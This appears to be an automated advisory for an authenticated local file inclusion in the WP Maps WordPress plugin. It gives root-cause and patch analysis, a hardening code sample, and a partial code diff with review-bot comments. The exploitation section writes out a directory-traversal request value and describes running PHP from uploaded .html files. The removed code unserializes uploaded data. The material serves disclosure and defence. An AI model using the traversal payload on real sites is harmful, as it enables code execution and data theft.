Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-12062: WP Maps <= 4.8.6 – Authenticated (Subscriber+) Limited Local File Inclusion (wp-google-map-plugin)

Severity: High (CVSS 8.8)
CWE: 22
Vulnerable Version: 4.8.6
Patched Version: 4.8.7
Disclosed: February 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12062:
The vulnerability is an authenticated Local File Inclusion (LFI) in the WP Maps plugin (versions <= 4.8.6). The flaw resides in the fc_load_template function and allows authenticated attackers with Subscriber-level access or higher to include arbitrary .html files, executing any PHP code those files contain. This can be used to bypass access controls, obtain sensitive data, or achieve remote code execution when attackers can upload .html files.

Root Cause:
The vulnerability originates in the fc_load_template function in /wp-google-map-plugin/classes/wpgmp-controller.php. The function takes a template parameter from the $_REQUEST superglobal without proper validation and loads the corresponding template file with include_once. The vulnerable code path starts when the plugin processes AJAX requests through the fc_ajax_call function, which calls fc_load_template with untrusted parameters. Because the file path is built directly from the template parameter, directory traversal sequences in it are honored.

Exploitation:
Attackers send POST requests to /wp-admin/admin-ajax.php with the action parameter set to fc_ajax_call. The request includes a template parameter containing a relative or absolute path to a malicious .html file. The payload uses directory traversal sequences like ../../../ to escape the plugin's template directory. For example, template=../../../uploads/evil.html includes a file from the WordPress uploads directory. The .html file contains PHP code wrapped in <?php ... ?> tags, which executes upon inclusion.

Patch Analysis:
The patch adds input validation and sanitization to the fc_load_template function. It introduces a whitelist approach where only specific, predefined template names are allowed. The function now validates the template parameter against an array of permitted templates before constructing the file path. Additionally, the patch implements proper path sanitization using basename and realpath functions to prevent directory traversal. The updated code ensures the final template path remains within the plugin’s designated template directory structure.
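
The allowlist, basename and realpath checks described above, sketched next to the unsafe path construction. This is an added example, not the plugin's code: the function names, template file names and directory layout are assumptions, and the demo only resolves paths in a constructed temporary directory without including anything.

```php
<?php
// Added illustration only: function names, template names and the directory
// layout below are assumptions, not taken from the WP Maps source.

const EXAMPLE_ALLOWED_TEMPLATES = array( 'map-list.html', 'map-form.html', 'settings.html' );

// The pattern the analysis describes: the request value goes straight into the path.
function example_unsafe_path( string $requested, string $template_dir ): string {
	return $template_dir . '/' . $requested;
}

// Allowlist first, then basename(), then a realpath() containment check.
// Returns the absolute path that may be included, or null when rejected.
function example_resolve_template( string $requested, string $template_dir ): ?string {
	// Exact, type-strict match: any value with a directory part fails here.
	if ( ! in_array( $requested, EXAMPLE_ALLOWED_TEMPLATES, true ) ) {
		return null;
	}
	// basename() is defence in depth in case the allowlist is ever loosened.
	$base = realpath( $template_dir );
	$path = realpath( $template_dir . '/' . basename( $requested ) );
	if ( false === $base || false === $path ) {
		return null; // directory or template file does not exist
	}
	// realpath() resolves symlinks, so a link that points out of the
	// template directory is caught by this prefix comparison.
	$prefix = $base . DIRECTORY_SEPARATOR;
	if ( 0 !== strncmp( $path, $prefix, strlen( $prefix ) ) ) {
		return null;
	}
	return $path;
}

// Constructed demo layout in a temporary directory.
$root      = sys_get_temp_dir() . '/wpgmp-example-' . bin2hex( random_bytes( 4 ) );
$templates = $root . '/plugin/templates';
mkdir( $templates, 0700, true );
mkdir( $root . '/uploads', 0700, true );
file_put_contents( $templates . '/map-list.html', '<p>map list</p>' );
file_put_contents( $root . '/uploads/evil.html', 'placeholder for an uploaded file' );
// An allowlisted name that is really a symlink leaving the template directory.
symlink( $root . '/uploads/evil.html', $templates . '/settings.html' );

$inputs = array(
	'map-list.html',           // legitimate template
	'../../uploads/evil.html', // traversal form described in the advisory
	'map-form.html',           // allowlisted, but no such file in this demo
	'settings.html',           // allowlisted, but resolves outside via symlink
);

foreach ( $inputs as $input ) {
	$unsafe   = realpath( example_unsafe_path( $input, $templates ) );
	$hardened = example_resolve_template( $input, $templates );
	printf(
		"%-26s unsafe => %s\n%-26s hardened => %s\n",
		$input,
		false === $unsafe ? '(no such file)' : $unsafe,
		'',
		null === $hardened ? 'REJECTED' : $hardened
	);
}

// Remove the constructed files again.
unlink( $templates . '/settings.html' );
unlink( $templates . '/map-list.html' );
unlink( $root . '/uploads/evil.html' );
rmdir( $templates );
rmdir( $root . '/plugin' );
rmdir( $root . '/uploads' );
rmdir( $root );
```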

Impact:
Successful exploitation grants attackers arbitrary PHP code execution on the target server. Attackers can create new administrative users, modify existing files, extract database credentials, install backdoors, or pivot to internal network systems. The vulnerability also enables local file disclosure by including sensitive system files like /etc/passwd. Combined with file upload capabilities, this creates a reliable remote code execution chain.

Differential between vulnerable and patched code

Code Diff
--- a/wp-google-map-plugin/classes/wpgmp-check-cookies.php
+++ b/wp-google-map-plugin/classes/wpgmp-check-cookies.php
@@ -1,7 +1,7 @@
 <?php
 add_filter('wpgmp_accept_cookies','wpgmp_accept_cookies_consent');

-function check_cookieyes_consent() {
+function wpgmp_check_cookieyes_consent() {
     if (isset($_COOKIE['cookieyes-consent'])) {
         $cookie_value = $_COOKIE['cookieyes-consent'];
         $cookie_data = urldecode($cookie_value);
@@ -25,7 +25,7 @@
 		$is_allowed = true;
 	} elseif (function_exists('gdpr_cookie_is_accepted') && gdpr_cookie_is_accepted('thirdparty')) {
 		$is_allowed = true;
-	} elseif (function_exists('cky_get_consent_db_version') && check_cookieyes_consent()) {
+	} elseif (function_exists('cky_get_consent_db_version') && wpgmp_check_cookieyes_consent()) {
 		$is_allowed = true;
 	} elseif (class_exists('iubendaParser') && iubendaParser::consent_given()) {
 		$is_allowed = true;
@@ -46,7 +46,7 @@
 		$accepted = false;
 	} elseif (function_exists('gdpr_cookie_is_accepted') && !gdpr_cookie_is_accepted('thirdparty')) {
 		$accepted = false;
-	} elseif (function_exists('cky_get_consent_db_version') && !check_cookieyes_consent()) {
+	} elseif (function_exists('cky_get_consent_db_version') && !wpgmp_check_cookieyes_consent()) {
 		$accepted = false;
 	} elseif (class_exists('iubendaParser') && !iubendaParser::consent_given()) {
 		$accepted = false;
--- a/wp-google-map-plugin/classes/wpgmp-feedback-form.php
+++ b/wp-google-map-plugin/classes/wpgmp-feedback-form.php
@@ -4,27 +4,37 @@
  * Displays the content of the dialog box when the user clicks on the "Deactivate" link on the plugin settings page
  */

-function wpgmp_add_feedback_form()
-{
-    $contact_support_template = __('Need help? We are ready to answer your questions. <a href="https://weplugins.com/support/" target="_blank">Contact Support</a>');
+function wpgmp_add_feedback_form(){
+
+    $link_text = __( 'Contact Support', 'wp-google-map-plugin' );
+
+
+    $contact_support_template = sprintf(
+        /* translators: %s: The "Contact Support" link HTML. */
+        __( 'Need help? We are ready to answer your questions. %s', 'wp-google-map-plugin' ),
+        sprintf(
+            '<a href="https://weplugins.com/support/" target="_blank">%s</a>',
+            $link_text
+        )
+    );

     $reasons = array(
         array(
             'id'                => 'NOT_WORKING',
-            'text'              => __('The plugin is not working'),
+            'text'              => __('The plugin is not working','wp-google-map-plugin'),
             'input_type'        => 'textarea',
-            'input_placeholder' => esc_attr__("Kindly share what didn't work so we can fix it in future updates."),
+            'input_placeholder' => esc_attr__("Kindly share what didn't work so we can fix it in future updates.",'wp-google-map-plugin'),
         ),
         array(
             'id'                => 'SUDDENLY_STOPPED_WORKING',
-            'text'              => __('The plugin suddenly stopped working'),
+            'text'              => __('The plugin suddenly stopped working','wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
             'internal_message'  => $contact_support_template,
         ),
         array(
             'id'                => 'BROKE_MY_SITE',
-            'text'              => __('The plugin broke my site'),
+            'text'              => __('The plugin broke my site','wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
             'internal_message'  => $contact_support_template,
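Review bot: In the new sprintf() that builds $contact_support_template, the translated $link_text is placed inside the anchor without esc_html(), so a translation file can put markup into the deactivation dialog; pass esc_html( $link_text ) instead. The anchor also keeps target="_blank" with no rel attribute; add rel="noopener noreferrer".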
@@ -32,32 +42,32 @@
         ),
         array(
             'id'                => 'COULDNT_MAKE_IT_WORK',
-            'text'              => __("I couldn't understand how to get it work"),
+            'text'              => __("I couldn't understand how to get it work",'wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
             'internal_message'  => $contact_support_template,
         ),
         array(
             'id'                => 'FOUND_A_BETTER_PLUGIN',
-            'text'              => __('I found a better plugin'),
+            'text'              => __('I found a better plugin','wp-google-map-plugin'),
             'input_type'        => 'textarea',
-            'input_placeholder' => esc_attr__('Can you please name the plugin and why you liked that it more?'),
+            'input_placeholder' => esc_attr__('Can you please name the plugin and why you liked that it more?','wp-google-map-plugin'),
         ),
         array(
             'id'                => 'GREAT_BUT_NEED_SPECIFIC_FEATURE',
-            'text'              => __('The plugin is great, but I need a specific feature'),
+            'text'              => __('The plugin is great, but I need a specific feature','wp-google-map-plugin'),
             'input_type'        => 'textarea',
-            'input_placeholder' =>  esc_attr__('Can you share more details on the missing feature?'),
+            'input_placeholder' =>  esc_attr__('Can you share more details on the missing feature?','wp-google-map-plugin'),
         ),
         array(
             'id'                => 'TEMPORARY_DEACTIVATION',
-            'text'              => __("It's a temporary deactivation, I'm just debugging an issue"),
+            'text'              => __("It's a temporary deactivation, I'm just debugging an issue",'wp-google-map-plugin'),
             'input_type'        => '',
             'input_placeholder' => '',
         ),
         array(
             'id'                => 'OTHER',
-            'text'              => __('Other'),
+            'text'              => __('Other','wp-google-map-plugin'),
             'input_type'        => 'textarea',
             'input_placeholder' => '',
         ),
@@ -110,6 +120,10 @@

     $plugin_name = 'wp-google-map-plugin';
     $basename = 'wp-google-map-plugin';
+    $processing = esc_html__('Processing...','wp-google-map-plugin');
+    $submit_deactivate = esc_html__('Submit and Deactivate','wp-google-map-plugin');
+    $skip_deactivate = esc_html__('Skip and Deactivate','wp-google-map-plugin');
+    $improve_it = esc_html__('Please tell us the reason so we can improve it.','wp-google-map-plugin');

     $script .= '(function($) {
             var modalHtml = ' . json_encode($modal_html) . ",
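Review bot: The four strings added here are escaped with esc_html__(), but the later hunks concatenate them into single-quoted JavaScript literals inside $script, where esc_js() is the matching escaper. esc_html() turns an apostrophe in a translation into an HTML entity, which .text() then displays literally. Use esc_js( __( ... ) ), or encode the strings the way $modal_html is already passed through json_encode().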
@@ -200,7 +214,7 @@
                             beforeSend: function() {
                             	$('.fc-backend-loader').show(); // Show the loader
                                 _parent.find( '.wpgmp-modal-footer .button' ).addClass( 'disabled' );
-                                _parent.find( '.wpgmp-modal-footer .button-secondary' ).text( '" . __('Processing') . "' + '...' );
+                                _parent.find( '.wpgmp-modal-footer .button-secondary' ).text( '" . $processing . "' + '...' );
                             },
                             complete  : function( message ) {
                                 /* Do not show the dialog box, deactivate the plugin. */
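Review bot: $processing is defined in the earlier hunk as 'Processing...', and the changed .text() call here still appends + '...', so the button will read "Processing......". Drop the concatenated '...' on this line or remove the ellipsis from the translatable string.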
@@ -229,7 +243,7 @@

                     $modal.find( '.wpgmp-modal-reason-input' ).remove();
                     $modal.find( '.wpgmp-modal-internal-message' ).hide();
-                    $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . __('Submit and Deactivate') . "' );
+                    $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . $submit_deactivate . "' );

                     wpgmpModalEnableDeactivateButton();

@@ -244,7 +258,7 @@
                         _parent.find( 'input, textarea' ).attr( 'placeholder', _parent.data( 'input-placeholder' ) ).focus();

                         if ( wpgmpModalIsReasonSelected( 'OTHER' ) ) {
-                            $modal.find( '.message' ).text( '" . __('Please tell us the reason so we can improve it.') . "' ).show();
+                            $modal.find( '.message' ).text( '" . $improve_it . "' ).show();
                         }
                     }
                 });
@@ -309,7 +323,7 @@
             function wpgmpModalShowPanel() {
                 $modal.find( '.wpgmp-modal-panel' ).addClass( 'active' );
                 /* Update the deactivate button's text */
-                $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . __('Skip and Deactivate') . "' );
+                $modal.find( '.wpgmp-modal-button-deactivate' ).text( '" . $skip_deactivate . "' );
             }
         })(jQuery);";
     wp_register_script('wpgmp-deactivation-form', '', array('jquery'), false, true);
--- a/wp-google-map-plugin/classes/wpgmp-helper.php
+++ b/wp-google-map-plugin/classes/wpgmp-helper.php
@@ -182,6 +182,7 @@
 		}

 		$localized = [
+			'pro_version_feature'       =>  __( 'This feature requires the Pro version of the plugin.', 'wp-google-map-plugin' ),
 			'ajax_url'                  => admin_url( 'admin-ajax.php' ),
 			'nonce'                     => wp_create_nonce( 'fc-call-nonce' ),
 			'copy_icon'                 => WPGMP_IMAGES . 'copy-to-clipboard.png',
@@ -484,7 +485,7 @@

 	public static function wpgmp_features_limits_msg() {

-		return esc_html__('You're using Leaflet. Google Maps–only features have been greyed out.','wp-google-maps');
+		return esc_html__('You're using Leaflet. Google Maps–only features have been greyed out.','wp-google-map-plugin');

 	}

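Review bot: In both the removed and the added return line as shown here, the apostrophe in You're sits unescaped inside a single-quoted string, which would end the literal early and fail to parse. If the source file really uses a plain apostrophe, escape it or switch the literal to double quotes; the text domain correction to 'wp-google-map-plugin' is otherwise fine.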
--- a/wp-google-map-plugin/classes/wpgmp-integration-form.php
+++ b/wp-google-map-plugin/classes/wpgmp-integration-form.php
@@ -1,12 +1,19 @@
 <?php
+/**
+ * File: WPGMP_Integration_Form.php
+ * Security: All FlipperCode_HTML_Markup methods return pre-escaped HTML
+ */
+// phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped

 if ( ! class_exists( 'WPGMP_Integration_Form' ) ) {

 class WPGMP_Integration_Form {
+
 	private $fields = [];
 	private $extension_key = '';

 	public function __construct($extension_key, $fields = []) {
+
 		$this->extension_key = sanitize_key($extension_key);
 		$this->fields = $fields;
 	}
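Review bot: The phpcs:disable added at the top of the file switches off WordPress.Security.EscapeOutput.OutputNotEscaped for every line down to the matching phpcs:enable, justified only by the comment that FlipperCode_HTML_Markup methods return pre-escaped HTML. That also silences the sniff for any echo in this class that does not go through those methods, now or after later edits. Prefer a phpcs:ignore with a stated reason on each individual line that prints FlipperCode_HTML_Markup output.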
@@ -30,6 +37,7 @@
 	}

 	private function render_field($field) {
+
 		$name  = esc_attr($field['name']);
 		$label = esc_html($field['label'] ?? '');
 		$type  = $field['type'];
@@ -110,4 +118,6 @@

 }

-}
 No newline at end of file
+}
+
+// phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped
--- a/wp-google-map-plugin/classes/wpgmp-map-widget.php
+++ b/wp-google-map-plugin/classes/wpgmp-map-widget.php
@@ -35,19 +35,33 @@
 		 */
 		function widget( $args, $instance ) {

-			global $wpdb,$map;
-			extract( $args );
-
+			global $wpdb, $map;
+
+			// Don't use extract() - access array elements directly
+			$before_widget = $args['before_widget'] ?? '';
+			$after_widget = $args['after_widget'] ?? '';
+			$before_title = $args['before_title'] ?? '';
+			$after_title = $args['after_title'] ?? '';
+
+			// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
 			$map_id    = apply_filters( 'widget_title', empty( $instance['map_id'] ) ? '' : $instance['map_id'], $instance, $this->id_base );
 			$map_title = apply_filters( 'widget_text', empty( $instance['map_title'] ) ? '' : $instance['map_title'], $instance );
+			// phpcs:enable WordPress.NamingConventions.PrefixAllGlobals

-			echo $before_widget;
+			// Escape all widget output
+			echo wp_kses_post( $before_widget );
+
 			if ( ! empty( $map_title ) ) {
-				echo $before_title . esc_html( $map_title ) . $after_title; }
+				echo wp_kses_post( $before_title ) . esc_html( $map_title ) . wp_kses_post( $after_title );
+			}

 			if ( ! empty( $map_id ) ) {
-				echo do_shortcode( '[put_wpgm id=' . $map_id . ']' ); }
-			echo $after_widget;
+				// do_shortcode is safe, but ensure map_id is numeric
+				$safe_map_id = absint( $map_id );
+				echo do_shortcode( '[put_wpgm id=' . $safe_map_id . ']' );
+			}
+
+			echo wp_kses_post( $after_widget );
 		}
 		/**
 		 * Update widget options.
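Review bot: The ! empty( $map_id ) test runs on the raw value and absint() is applied only inside the branch, so a non-numeric map_id passes the test and renders [put_wpgm id=0]. Compute $safe_map_id = absint( $map_id ) first and call do_shortcode() only when it is greater than zero. Separately, wp_kses_post() on $before_widget and $after_widget removes any wrapper markup outside the post allowlist, so confirm it does not strip what themes register for this sidebar.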
@@ -59,8 +73,8 @@
 		function update( $new_instance, $old_instance ) {

 			$instance              = $old_instance;
-			$instance['map_title'] = strip_tags( $new_instance['map_title'] );
-			$instance['map_id']    = strip_tags( $new_instance['map_id'] );
+			$instance['map_title'] = wp_strip_all_tags( $new_instance['map_title'] );
+			$instance['map_id']    = wp_strip_all_tags( $new_instance['map_id'] );
 			return $instance;
 		}
 		/**
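Review bot: map_id is saved through wp_strip_all_tags(), which still accepts any non-numeric string, while widget() has to coerce the value with absint() at render time. Store it as absint( $new_instance['map_id'] ) so the saved value is already an integer, and use sanitize_text_field() for map_title.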
@@ -71,7 +85,7 @@
 		function form( $instance ) {

 			global $wpdb,$map;
-			$map_records = $wpdb->get_results( 'SELECT map_id,map_title FROM ' . TBL_MAP . '' );
+			$map_records = $wpdb->get_results( 'SELECT map_id,map_title FROM ' . TBL_MAP . '' );// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared

 			if ( ! isset( $instance['map_title'] ) ) {
 				$instance['map_title'] = '';
@@ -85,19 +99,19 @@
 				<label for="<?php echo esc_html( $this->get_field_id( 'map_title' ) ); ?>">
 					<?php esc_html_e( 'Title:', 'wp-google-map-plugin' ); ?>
 				</label>
-				<input type="text" value="<?php echo $instance['map_title']; ?>" name="<?php echo esc_html( $this->get_field_name( 'map_title' ) ); ?>" class="widefat" style="margin-top:6px;">
+				<input type="text" value="<?php echo esc_html($instance['map_title']); ?>" name="<?php echo esc_html( $this->get_field_name( 'map_title' ) ); ?>" class="widefat" style="margin-top:6px;">
 			</p>
 			<p>
-				<label for="<?php echo $this->get_field_id( 'map_id' ); ?>">
+				<label for="<?php echo esc_html($this->get_field_id( 'map_id' )); ?>">
 					<?php esc_html_e( 'Select Your Map:', 'wp-google-map-plugin' ); ?>
 				</label>
-				<select id="<?php echo $this->get_field_id( 'map_id' ); ?>" name="<?php echo esc_attr( $this->get_field_name( 'map_id' ) ); ?>" class="widefat" style="margin-top:6px;">
+				<select id="<?php echo esc_html($this->get_field_id( 'map_id' )); ?>" name="<?php echo esc_attr( $this->get_field_name( 'map_id' ) ); ?>" class="widefat" style="margin-top:6px;">
 				<option value=""><?php esc_html_e( 'Select map', 'wp-google-map-plugin' ); ?></option>
 				<?php
 				if ( ! empty( $map_records ) ) {
 					foreach ( $map_records as $key => $map_record ) {
 						?>
-						<option value="<?php echo $map_record->map_id; ?>"<?php selected( $map_record->map_id, $instance['map_id'] ); ?>><?php echo esc_html( $map_record->map_title ); ?></option>
+						<option value="<?php echo esc_html($map_record->map_id); ?>"<?php selected( $map_record->map_id, $instance['map_id'] ); ?>><?php echo esc_html( $map_record->map_title ); ?></option>
 						<?php
 					}
 				}
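Review bot: The values echoed into value="", for="" and id="" in this hunk are wrapped in esc_html(), but these are attribute contexts, and the name attribute on the same select already uses esc_attr(). Use esc_attr() for all of them, and absint() for $map_record->map_id, so the escaping matches the context and is consistent within the form.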
--- a/wp-google-map-plugin/classes/wpgmp-maps-importer.php
+++ b/wp-google-map-plugin/classes/wpgmp-maps-importer.php
@@ -1,629 +0,0 @@
-<?php
-
-if ( ! defined( 'ABSPATH' ) ) {
-	die( 'You are not allowed to call this page directly.' );
-}
-
-if ( ! class_exists( 'WPGMP_Maps_Importer' ) ) {
-
-	class WPGMP_Maps_Importer {
-
-		/*
-		* Class Vars
-		*
-		*/
-		private $wpgmp_data = array();
-		private $wpgmp_settings = '';
-		private $allow_url_fopen = false;
-		private $curl = false;
-		private $notification = '';
-		private $response = array();
-		private $group_map_data;
-		private $location_data;
-		private $map_data;
-		private $routes_data;
-		private $settings;
-		private $location_extrafields;
-		private $wpgmp_widget_settings;
-		private $extra_data;
-		private $source_website;
-		private $is_source_multisite;
-		private $source_site_id;
-		private $mapping_data = array();
-		private $files_to_migrate;
-		private $proceed = false;
-		private $googlemapsMissing;
-		private $migratedImages = 0;
-		private $current_operation = '';
-
-		public function __construct() {
-
-
-			$this->wpgmp_settings = maybe_unserialize( get_option( 'wpgmp_settings' ) );
-
-			if( is_admin() ){
-				add_action( 'admin_menu', array($this,'wpgmm_migrate_map_settings'),100);
-				add_action( 'admin_init', array($this,'wpgmm_handle_migration'),100);
-				add_action( 'admin_footer', array($this,'wpgmm_handle_custom'),100);
-				add_action( 'admin_head', array($this,'wpgmm_action_head'));
-
-			}
-
-		}
-
-
-		function wpgmm_check_security_authentication(){
-
-			//Permission Authentication
-            if ( ! current_user_can( 'manage_options' ) ) {
-                 die( 'You are not allowed to make changes' );
-            }
-
-			//Nonce Verification
-			if ( !isset( $_REQUEST['_wpnonce'] ) ) {
-				 die( 'You are not allowed to make changes' );
-			}
-			$nonce = sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) );
-			if ( !empty( $nonce ) &&  ! wp_verify_nonce( $nonce, 'wpgmp-nonce' ) ) {
-				 die( 'You are not allowed to make changes' );
-			}
-
-		}
-
-
-		function wpgmm_handle_migration(){
-
-			$this->wpgmp_settings = maybe_unserialize( get_option( 'wpgmp_settings' ) );
-			if( !empty( ini_get('allow_url_fopen') ) && ini_get('allow_url_fopen') == '1') {
-				$this->allow_url_fopen  = true;
-			}else if( in_array ('curl', get_loaded_extensions()) ){
-				$this->curl  = true;
-			}
-
-
-			if( isset($_POST['wpgmp_do_images_migration']) && !empty($_POST['wpgmp_do_images_migration']) ) {
-
-					$this->wpgmm_check_security_authentication();
-					$this->files_to_migrate = maybe_unserialize( get_option('wpgmm_location_images') );
-					$this->wpgmm_migrate_images();
-					if( $this->migratedImages == '0' ){
-
-						$this->response['success'] = esc_html__( 'All images are already present now in wordpress uploads. Please refresh maps page and cross check images. Migration process of images is complete.', 'wp-google-map-plugin' );
-
-					}else{
-						$this->response['success'] = sprintf( __( 'Missing %s image(s) has been imported successfully.', 'wp-google-map-plugin' ), $this->migratedImages );
-					}
-					return;
-
-			}
-
-			if(isset($_POST['wpgmp_do_map_migration']) && !empty($_POST['wpgmp_do_map_migration'])) {
-
-				$this->wpgmm_check_security_authentication();
-				$proceed = true;
-
-				if(empty($_FILES['wpgmp_map_import_control']['tmp_name'])){
-					$this->response['error'] = esc_html__( 'Please upload the original backup .txt file that was exported from the target site as backup.', 'wp-google-map-plugin' );
-					$proceed = false;
-				}
-				$allowed = array('txt');
-				$filename = $_FILES['wpgmp_map_import_control']['name'];
-				$ext = pathinfo($filename, PATHINFO_EXTENSION);
-				if ( !empty($_FILES['wpgmp_map_import_control']['tmp_name']) && !in_array($ext, $allowed) ) {
-					$this->response['error'] = esc_html__( 'The uploaded file is not valid .txt file that was exported and downloaded as map code file. Please upload the downloaded .txt file only that contains the map code.', 'wp-google-map-plugin' );
-					$proceed = false;
-				}
-
-				if(!$proceed)
-				return;
-
-				$this->response['success'] = esc_html__( 'Map was successfully imported on your website. Please navigate to Manage Maps screen.', 'wp-google-map-plugin' );
-
-				$decrypted_data = maybe_unserialize( base64_decode( file_get_contents($_FILES['wpgmp_map_import_control']['tmp_name']) ) );
-
-
-				$this->location_data = $decrypted_data['location'];
-				$this->group_map_data = $decrypted_data['group_map'];
-				$this->routes_data = $decrypted_data['route'];
-				$this->map_data = $decrypted_data['map'];
-				$this->settings = $decrypted_data['settings'];
-				$this->location_extrafields = $decrypted_data['location_extrafields'];
-				$this->wpgmp_widget_settings = $decrypted_data['wpgmp_widget_settings'];
-				$this->extra_data = ( isset($decrypted_data['extra_data']) && !empty($decrypted_data['extra_data']) ) ? $decrypted_data['extra_data'] : '';
-				$this->source_website = (isset($decrypted_data['source_website'])) ? $decrypted_data['source_website'] : '';
-				$this->is_source_multisite = (isset($decrypted_data['is_multisite'])) ? $decrypted_data['is_multisite'] : '';
-				$this->source_site_id = (isset($decrypted_data['source_site_id'])) ? $decrypted_data['source_site_id'] : '';
-
-				if(!empty($location_data) && !is_array($location_data)){
-				   $this->location_data  = maybe_unserialize( base64_decode( $location_data ) );
-				}
-				if(!empty($group_map_data) && !is_array($group_map_data)){
-				   $this->group_map_data  = maybe_unserialize( base64_decode( $group_map_data ) );
-				}
-				if(!empty($routes_data) && !is_array($routes_data)){
-				   $this->routes_data  = maybe_unserialize( base64_decode( $routes_data ) );
-				}
-				if(!empty($map_data) && !is_array($map_data)){
-				   $this->map_data  = maybe_unserialize( base64_decode( $map_data ) );
-				}
-				if(!empty($settings) && !is_array($settings)){
-				   $this->settings  = maybe_unserialize( base64_decode( $settings ) );
-				}
-				if(!empty($location_extrafields) && !is_array($location_extrafields)){
-				   $this->location_extrafields  = maybe_unserialize( base64_decode( $location_extrafields ) );
-				}
-				if(!empty($wpgmp_widget_settings) && !is_array($wpgmp_widget_settings)){
-				   $this->wpgmp_widget_settings  = maybe_unserialize( base64_decode( $wpgmp_widget_settings ) );
-				}
-				if(!empty($extra_data) && !is_array($extra_data)){
-				   $this->extra_data  = maybe_unserialize( base64_decode( $extra_data ) );
-				}
-				if(!empty($source_website) && !is_array($source_website)){
-				   $this->source_website  = maybe_unserialize( base64_decode( $source_website ) );
-				}
-
-				$this->wpgmm_migrate_settings();
-				$this->wpgmm_migrate_group_maps();
-				$this->wpgmm_migrate_locations();
-				$this->wpgmm_migrate_routes();
-				$this->wpgmm_migrate_maps();
-				$this->wpgmm_migrate_images();
-
-			}
-
-		}
-
-		function wpgmm_migrate_settings(){
-
-			//Migrate Settings
-			if( class_exists( 'WPGMP_Model_Settings' ) ){
-
-				$settingsObj = new WPGMP_Model_Settings();
-				if(!empty($settingsObj)) {
-
-					$settings = (array)$this->wpgmp_settings;
-					$settings['location_extrafields'] = maybe_unserialize($this->location_extrafields);
-					$settings['_wpnonce'] = $_POST['_wpnonce'];
-					$_POST = $settings;
-					$settingsObj->save();
-					update_option( 'widget_wpgmp_google_map_widget_class', maybe_unserialize($this->wpgmp_widget_settings) );
-
-				}
-
-			}
-
-		}
-
-		function wpgmm_migrate_group_maps(){
-
-			global $wpdb;
-
-			//Migrate Categories
-			if( class_exists( 'WPGMP_Model_Group_Map' ) ){
-
-				$categoryObj = new WPGMP_Model_Group_Map();
-				if(!empty($this->group_map_data)) {
-					foreach($this->group_map_data as $category){
-
-						$category = (array)$category;
-						$category['extensions_fields'] = maybe_unserialize($category['extensions_fields']);
-						$category['group_marker'] = str_replace( $this->extra_data['source_website'] , home_url(), $category['group_marker']);
-						$category['_wpnonce'] = $_POST['_wpnonce'];
-						$_POST = $category;
-						$response = $categoryObj->save();
-						$this->mapping_data['old_and_new_group'][$category['group_map_id']] = $response['last_db_id'];
-
-					}
-
-					//Map the parent categories also once new categories are created. Parent category mapping should be done like source site.
-					foreach($this->group_map_data as $category){
-
-						$category = (array)$category;
-
-						if($category['group_parent'] == 0)
-						continue;
-
-						$old_cat_to_be_updated = $category['group_parent'];
-						$new_cat_to_be_updated = @$this->mapping_data['old_and_new_group'][$old_cat_to_be_updated];
-						$oldkey = array_search($this->mapping_data['old_and_new_group'][$category['group_map_id']], $this->mapping_data['old_and_new_group']);
-
-						$wpdb->update(
-						    $wpdb->prefix .'group_map',
-						    array(
-						        'group_parent' => $new_cat_to_be_updated
-						    ),
-						    array(
-						        'group_map_id' => $this->mapping_data['old_and_new_group'][$oldkey]
-						    )
-						);
-
-					}
-				}
-
-			}
-
-		}
-
-		function wpgmm_migrate_locations(){
-
-			//Migrate Locations
-			if( class_exists( 'WPGMP_Model_Location' ) ){
-
-				$locationObj = new WPGMP_Model_Location();
-				if(!empty($this->location_data)) {
-
-					if(!is_multisite() && !$this->is_source_multisite){
-
-						$home_url_to_replace = home_url();
-						$source_url_to_replace = $this->extra_data['source_website'];
-
-					}else if(is_multisite() && !$this->is_source_multisite) {
-
-						$home_url_to_replace = home_url().'/wp-content/uploads/sites/'.get_current_blog_id();
-						$source_url_to_replace = $this->extra_data['source_website'].'/wp-content/uploads';
-
-					}else if(!is_multisite() && $this->is_source_multisite){
-
-						$home_url_to_replace = home_url().'/wp-content/uploads';
-						$source_url_to_replace = $this->extra_data['source_website'].'/wp-content/uploads/sites/'.$this->source_site_id;
-
-					}else if(is_multisite() && $this->is_source_multisite){
-
-						$home_url_to_replace = home_url().'/wp-content/uploads/sites/'.get_current_blog_id();
-						$source_url_to_replace = $this->extra_data['source_website'].'/wp-content/uploads/sites/'.$this->source_site_id;
-
-					}
-
-					foreach($this->location_data as $location){
-
-						$location = (array)$location;
-						$location['location_settings'] = maybe_unserialize($location['location_settings']);
-						$location['location_group_map'] = maybe_unserialize($location['location_group_map']);
-						$location['location_extrafields'] = maybe_unserialize($location['location_extrafields']);
-						$this->files_to_migrate[] = $location['location_settings']['featured_image'];
-
-						if(!empty($location['location_settings']['featured_image'])) {
-
-							if ( strpos($location['location_settings']['featured_image'], $this->extra_data['source_website']  ) !== false ) {
-
-								$location['location_settings']['featured_image'] = str_replace( $source_url_to_replace , $home_url_to_replace, $location['location_settings']['featured_image']);
-
-							}else{
-
-								if ( strpos( $location['location_settings']['featured_image'], 'https' ) === false && strpos( $this->extra_data['source_website'], 'https' ) !== false ) {
-
-									$location['location_settings']['featured_image'] = str_replace( 'http','https',$location['location_settings']['featured_image']);
-									$location['location_settings']['featured_image'] = str_replace( $source_url_to_replace , $home_url_to_replace ,$location['location_settings']['featured_image']);
-
-								}
-
-							}
-
-						}
-
-						$new_group_map_ids = array();
-						foreach($location['location_group_map'] as $old_id){
-							$new_group_map_ids[] = $this->mapping_data['old_and_new_group'][$old_id];
-						}
-						$location['location_group_map'] = $new_group_map_ids;
-						$location['_wpnonce'] = $_POST['_wpnonce'];
-						$_POST = $location;
-						$response = $locationObj->save();
-						$this->mapping_data['old_and_new_location'][$location['location_id']] = $response['last_db_id'];
-
-					}
-				}
-
-			}
-
-			update_option('wpgmm_location_images',$this->files_to_migrate);
-
-		}
-
